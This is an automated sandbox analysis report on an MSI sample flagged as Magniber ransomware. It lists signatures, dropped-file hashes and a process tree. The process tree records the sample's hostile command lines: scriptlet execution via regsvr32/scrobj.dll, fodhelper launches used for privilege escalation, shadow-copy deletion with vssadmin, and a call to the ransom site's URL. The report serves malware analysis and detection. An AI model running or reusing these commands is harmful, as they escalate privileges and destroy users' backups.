Overview

overview

10

Static

static

1

41ef278a86...3e.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    114s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 12:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi

  • Size

    96KB

  • MD5

    42ad49ed99c0d41a820316309bc2c3b3

  • SHA1

    f447a72b3cbea72e1b56fda8f44fd9f304b4474a

  • SHA256

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

  • SHA512

    4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

  • SSDEEP

    1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun

Score
10/10
magniberdefense_evasionexecutionimpactransomware

Malware Config

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (86) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      2⤵
      • Modifies registry class
      PID:2224
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
        PID:5704
        • C:\Windows\system32\fodhelper.exe
          fodhelper.exe
          3⤵
            PID:5832
            • C:\Windows\system32\regsvr32.exe
              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
              4⤵
                PID:5984
                • C:\Windows\System32\vssadmin.exe
                  "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:1296
          • C:\Windows\system32\cmd.exe
            cmd /c "start fodhelper.exe"
            2⤵
              PID:5196
              • C:\Windows\system32\fodhelper.exe
                fodhelper.exe
                3⤵
                  PID:5320
                  • C:\Windows\system32\regsvr32.exe
                    "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                    4⤵
                      PID:5828
                      • C:\Windows\System32\vssadmin.exe
                        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                        5⤵
                        • Interacts with shadow copies
                        PID:5856
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:2544
                • C:\Windows\system32\regsvr32.exe
                  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
                  2⤵
                  • Modifies registry class
                  PID:5008
                • C:\Windows\system32\cmd.exe
                  cmd /c "start fodhelper.exe"
                  2⤵
                    PID:5700
                    • C:\Windows\system32\fodhelper.exe
                      fodhelper.exe
                      3⤵
                        PID:5848
                        • C:\Windows\system32\regsvr32.exe
                          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                          4⤵
                            PID:5960
                            • C:\Windows\System32\vssadmin.exe
                              "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                              5⤵
                              • Interacts with shadow copies
                              PID:6112
                      • C:\Windows\system32\cmd.exe
                        cmd /c "start fodhelper.exe"
                        2⤵
                          PID:5256
                          • C:\Windows\system32\fodhelper.exe
                            fodhelper.exe
                            3⤵
                              PID:5672
                              • C:\Windows\system32\regsvr32.exe
                                "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                                4⤵
                                  PID:5700
                                  • C:\Windows\System32\vssadmin.exe
                                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                    5⤵
                                    • Interacts with shadow copies
                                    PID:5932
                          • C:\Windows\system32\taskhostw.exe
                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2764
                            • C:\Windows\system32\regsvr32.exe
                              regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
                              2⤵
                              • Modifies registry class
                              PID:1672
                            • C:\Windows\system32\cmd.exe
                              cmd /c "start fodhelper.exe"
                              2⤵
                                PID:5716
                                • C:\Windows\system32\fodhelper.exe
                                  fodhelper.exe
                                  3⤵
                                    PID:5840
                                    • C:\Windows\system32\regsvr32.exe
                                      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                                      4⤵
                                        PID:5972
                                        • C:\Windows\System32\vssadmin.exe
                                          "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                          5⤵
                                          • Interacts with shadow copies
                                          PID:6104
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c "start fodhelper.exe"
                                    2⤵
                                      PID:5444
                                      • C:\Windows\system32\fodhelper.exe
                                        fodhelper.exe
                                        3⤵
                                          PID:5340
                                          • C:\Windows\system32\regsvr32.exe
                                            "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                                            4⤵
                                              PID:5792
                                              • C:\Windows\System32\vssadmin.exe
                                                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                                5⤵
                                                • Interacts with shadow copies
                                                PID:5896
                                      • C:\Windows\system32\msiexec.exe
                                        msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
                                        1⤵
                                        • Enumerates connected drives
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        PID:3796
                                      • C:\Windows\system32\msiexec.exe
                                        C:\Windows\system32\msiexec.exe /V
                                        1⤵
                                        • Enumerates connected drives
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:4652
                                        • C:\Windows\system32\srtasks.exe
                                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                          2⤵
                                            PID:2000
                                          • C:\Windows\System32\MsiExec.exe
                                            C:\Windows\System32\MsiExec.exe -Embedding DCB7D1486F40DA76AEDBF2B62B910683
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: MapViewOfSection
                                            • Suspicious use of WriteProcessMemory
                                            PID:4448
                                            • C:\Windows\System32\cmd.exe
                                              cmd /c "start microsoft-edge:http://ccec70b0766c18c0e048tbodbmuw.ofrisk.info/tbodbmuw^&2^&54351261^&86^&409^&2219041
                                              3⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1672
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://ccec70b0766c18c0e048tbodbmuw.ofrisk.info/tbodbmuw&2&54351261&86&409&2219041
                                                4⤵
                                                • Enumerates system info in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                • Suspicious use of WriteProcessMemory
                                                PID:1464
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb829f46f8,0x7ffb829f4708,0x7ffb829f4718
                                                  5⤵
                                                    PID:3000
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
                                                    5⤵
                                                      PID:4776
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1012
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                                      5⤵
                                                        PID:5012
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
                                                        5⤵
                                                          PID:4932
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                          5⤵
                                                            PID:4488
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
                                                            5⤵
                                                              PID:2724
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
                                                              5⤵
                                                                PID:3620
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                                                                5⤵
                                                                  PID:1552
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                                                                  5⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5172
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
                                                                  5⤵
                                                                    PID:5188
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
                                                                    5⤵
                                                                      PID:5196
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
                                                                      5⤵
                                                                        PID:5488
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
                                                                        5⤵
                                                                          PID:5596
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
                                                                          5⤵
                                                                            PID:2736
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:1
                                                                            5⤵
                                                                              PID:2536
                                                                    • C:\Windows\system32\vssvc.exe
                                                                      C:\Windows\system32\vssvc.exe
                                                                      1⤵
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3828
                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:1420
                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                        1⤵
                                                                          PID:2876

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Config.Msi\e57786d.rbs
                                                                          Filesize

                                                                          7KB

                                                                          MD5

                                                                          4d846887950a931b9635f1774c8fdf70

                                                                          SHA1

                                                                          d95225fec82f9c4f155b1baceafa63058cefb63b

                                                                          SHA256

                                                                          e85bda6aa9d0383fe7c61778ba83ac329ce3cd0d3b174a1cd37adea51561b23e

                                                                          SHA512

                                                                          4074bc5643de5e95dcf789ab27e7941eb94e779adfdfe8a4768d9023d893914870c76a5578c96f847803188ff27ab18c51e036a118d1eb849789736216321357

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                          Filesize

                                                                          152B

                                                                          MD5

                                                                          612a6c4247ef652299b376221c984213

                                                                          SHA1

                                                                          d306f3b16bde39708aa862aee372345feb559750

                                                                          SHA256

                                                                          9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a

                                                                          SHA512

                                                                          34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                          Filesize

                                                                          152B

                                                                          MD5

                                                                          56641592f6e69f5f5fb06f2319384490

                                                                          SHA1

                                                                          6a86be42e2c6d26b7830ad9f4e2627995fd91069

                                                                          SHA256

                                                                          02d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455

                                                                          SHA512

                                                                          c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          1dd5da65f7e43c880ff053aac9abdc69

                                                                          SHA1

                                                                          8d9f8646eb85358b5ff2a6f823e669d25b37bf6e

                                                                          SHA256

                                                                          b8710849e26a5fe393f0612a9e974bb61432015a790334b9cba8f7654fc277e3

                                                                          SHA512

                                                                          1b101470e4ebdfdf1d9c3f0ed96383437f67d7809729ee677b7858261d5e0f8c3a0a5c65dd14a73d927ce91bb243e678ee8a24a9dc9bc3e8e46955b42ad2020f

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                          Filesize

                                                                          5KB

                                                                          MD5

                                                                          6e3b15b1ed2ab1c824c4e6487f8b93f3

                                                                          SHA1

                                                                          0851b0a49d4dbbebf26c8ab4b918dc6fc2ba711b

                                                                          SHA256

                                                                          92f902e528cf383cd197503bec20f24535e501acfa14eea812a8339e8fdd11ad

                                                                          SHA512

                                                                          3245efae35e7fb313519714f00b340e56378f6c3db9cba04330b9f55a95075b6509260e6bcda0b91ef24f9653cffec4d5bfb81f22ddbda83431fc4365d057683

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                          Filesize

                                                                          16B

                                                                          MD5

                                                                          46295cac801e5d4857d09837238a6394

                                                                          SHA1

                                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                          SHA256

                                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                          SHA512

                                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                          Filesize

                                                                          16B

                                                                          MD5

                                                                          206702161f94c5cd39fadd03f4014d98

                                                                          SHA1

                                                                          bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                          SHA256

                                                                          1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                          SHA512

                                                                          0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                          Download Submit

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                          Filesize

                                                                          11KB

                                                                          MD5

                                                                          ef8d5e7f06540af2f8d5a061dcd9c018

                                                                          SHA1

                                                                          277c075cb60e5c1564507f7aa7dcca870a6991b0

                                                                          SHA256

                                                                          bdeec4a7ab6774cb4f0d8a0a278b6a9364619c4631464e893ea20db51d80aafe

                                                                          SHA512

                                                                          aae576d9ad237b89ae215c2a5ac2f1b59062c77a38ca91d551ca18a71d168c093cf37f2c8d6ba328844ef3b60353974114659702ef814444c69a3a60d1db2eee

                                                                          Download Submit

                                                                        • C:\Users\Admin\Pictures\README.html
                                                                          Filesize

                                                                          17KB

                                                                          MD5

                                                                          aa2b401976fa12aeb66bce4c7e83b9d9

                                                                          SHA1

                                                                          0dae7ceb38a16050d35beec4b7858c5ad0e58b8e

                                                                          SHA256

                                                                          7e35ae2561e8e179402b88312c8ede9adb10a36b61aaeb4a5e266691c0208f97

                                                                          SHA512

                                                                          4f3262a1a2ab7159fe2af11926c2a8d02ef422559e8ff4f0832367aefb0709a510f48fea2c22b89ff49f3b9804e5f7a6a627a6031a35516c05da4810ec1083cd

                                                                          Download Submit

                                                                        • C:\Users\Public\dsv3cwbg27yh
                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          947919690674ae37064deafb3fa326db

                                                                          SHA1

                                                                          b79f7f3ad22c9e84546750502f517d16a7618366

                                                                          SHA256

                                                                          fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801

                                                                          SHA512

                                                                          c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b

                                                                          Download Submit

                                                                        • C:\Users\Public\x5m0mhr74m7
                                                                          Filesize

                                                                          4KB

                                                                          MD5

                                                                          a756835ce38c068139d8fad26cb47fed

                                                                          SHA1

                                                                          c1bb3d145188606d07e7b29d86ea6a08586e268d

                                                                          SHA256

                                                                          d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78

                                                                          SHA512

                                                                          d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac

                                                                          Download Submit

                                                                        • C:\Windows\Installer\MSI78F9.tmp
                                                                          Filesize

                                                                          56KB

                                                                          MD5

                                                                          91de8a79098ac3d20726e1acb50cd05d

                                                                          SHA1

                                                                          9cb04003c75f0cb63fe0c6dcd22a0c64d63154be

                                                                          SHA256

                                                                          54f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea

                                                                          SHA512

                                                                          70cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3

                                                                          Download Submit

                                                                        • C:\Windows\Installer\e57786c.msi
                                                                          Filesize

                                                                          96KB

                                                                          MD5

                                                                          42ad49ed99c0d41a820316309bc2c3b3

                                                                          SHA1

                                                                          f447a72b3cbea72e1b56fda8f44fd9f304b4474a

                                                                          SHA256

                                                                          41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

                                                                          SHA512

                                                                          4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

                                                                          Download Submit

                                                                        • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                          Filesize

                                                                          23.7MB

                                                                          MD5

                                                                          d56556a295262e2749d7c618ef15a8f2

                                                                          SHA1

                                                                          1c15d8108be9300335205ea330049db1603cc9d4

                                                                          SHA256

                                                                          6e039222f7f56a5e89d7412df7642f172acfd7de2eff117ddd3119dcb3fc6948

                                                                          SHA512

                                                                          32c48566cd701a866d6cdd9443ff0d6533a3d949bc1a49febe867011f90d3e0cf59015f251bf9fa436ab3ed6d011fd157ff8a8a33a6f12f92815077dd508f01a

                                                                          Download Submit

                                                                        • \??\Volume{8fc740eb-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{903da240-7bac-4f63-b5cd-ee6a7721d15c}_OnDiskSnapshotProp
                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          5dcdee154fd89f61245ee37ea0209d5e

                                                                          SHA1

                                                                          ca6460ee6c89974bcf78343b08380287ba237703

                                                                          SHA256

                                                                          60cacf2eecf6841ab7c67bdbf9da1d6f288a26a2ee501001d23a9d94b87513c3

                                                                          SHA512

                                                                          c2cc6d8806269010278e2521a6cd19698b638d132e774a33cb13b28bed141814b86a0181cfa796e07685c2e0969782d28d059212964238aa4c3ecfa408d5144d

                                                                          Download Submit

                                                                        • \??\pipe\LOCAL\crashpad_1464_SVDHQLZRLQCAHQAY
                                                                          MD5

                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                          SHA1

                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                          SHA256

                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                          SHA512

                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                          Download Submit

                                                                        • memory/2516-11-0x000002265C3F0000-0x000002265C3F3000-memory.dmp

                                                                          Filesize

                                                                          12KB

                                                                          Download